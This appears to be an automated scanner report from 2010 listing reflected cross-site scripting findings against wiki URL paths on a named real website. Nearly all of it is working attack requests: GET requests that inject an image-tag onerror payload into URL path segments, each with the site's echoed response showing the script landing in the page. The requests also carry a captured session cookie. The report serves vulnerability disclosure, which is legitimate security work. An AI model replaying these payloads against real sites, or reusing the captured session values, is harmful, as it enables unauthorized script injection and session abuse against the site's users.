HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:12 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12976 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWikifebcb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50bdafe04d3/JaneZupan?format=xar&name=XWikifebcb"><img src=a onerror=alert(1)>50bdafe04d3.JaneZupan&pages=XWikifebcb"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 was submitted in the REST URL parameter 5. This input was echoed as 29e70<img src=a onerror=alert(1)>3e0dea1fff1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki/JaneZupan29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:39 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12898 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan29e70%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3e0dea1fff1'>JaneZupan29e70<img src=a onerror=alert(1)>3e0dea1fff1</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed was submitted in the REST URL parameter 5. This input was echoed as 2299e"><img src=a onerror=alert(1)>dafd44348ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki/JaneZupan2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:42 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12960 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/JaneZupan2299e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edafd44348ed?format=xar&name=XWiki.JaneZupan2299e"><img src=a onerror=alert(1)>dafd44348ed&pages=XWiki.JaneZupan2299e"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520 was submitted in the REST URL parameter 4. This input was echoed as f82cb<img src=a onerror=alert(1)>e26b388e520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWikif82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520/LiseKemen HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:04 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12910 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/XWikif82cb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee26b388e520/">XWikif82cb<img src=a onerror=alert(1)>e26b388e520</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639 was submitted in the REST URL parameter 4. This input was echoed as 5ad3d"><img src=a onerror=alert(1)>d2452f8f639 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639/LiseKemen HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:19 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12976 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWiki5ad3d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2452f8f639/LiseKemen?format=xar&name=XWiki5ad3d"><img src=a onerror=alert(1)>d2452f8f639.LiseKemen&pages=XWiki5ad3d"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 was submitted in the REST URL parameter 5. This input was echoed as 2f67e"><img src=a onerror=alert(1)>480fe619997 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki/LiseKemen2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:52 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12960 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/LiseKemen2f67e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E480fe619997?format=xar&name=XWiki.LiseKemen2f67e"><img src=a onerror=alert(1)>480fe619997&pages=XWiki.LiseKemen2f67e"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 was submitted in the REST URL parameter 5. This input was echoed as f7c5f<img src=a onerror=alert(1)>e5413791935 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki/LiseKemenf7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:37 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12898 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemenf7c5f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5413791935'>LiseKemenf7c5f<img src=a onerror=alert(1)>e5413791935</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39 was submitted in the REST URL parameter 4. This input was echoed as a2182"><img src=a onerror=alert(1)>af9c268fe39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/skinsa2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39/toucan HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:59 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12937 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/skinsa2182%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaf9c268fe39/toucan?format=xar&name=skinsa2182"><img src=a onerror=alert(1)>af9c268fe39.toucan&pages=skinsa2182"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729 was submitted in the REST URL parameter 4. This input was echoed as a8e50<img src=a onerror=alert(1)>a4e8dc4d729 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/skinsa8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729/toucan HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:55 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12871 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/skinsa8e50%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea4e8dc4d729/">skinsa8e50<img src=a onerror=alert(1)>a4e8dc4d729</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 was submitted in the REST URL parameter 5. This input was echoed as 6c090"><img src=a onerror=alert(1)>927538bfc55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/skins/toucan6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:32 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12921 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan6c090%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E927538bfc55?format=xar&name=skins.toucan6c090"><img src=a onerror=alert(1)>927538bfc55&pages=skins.toucan6c090"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 was submitted in the REST URL parameter 5. This input was echoed as e9b27<img src=a onerror=alert(1)>b14aaf13493 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/skins/toucane9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:43 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12859 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucane9b27%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb14aaf13493'>toucane9b27<img src=a onerror=alert(1)>b14aaf13493</a> ...[SNIP]...
Report generated by XSS.CX at Mon Nov 15 09:29:35 CST 2010.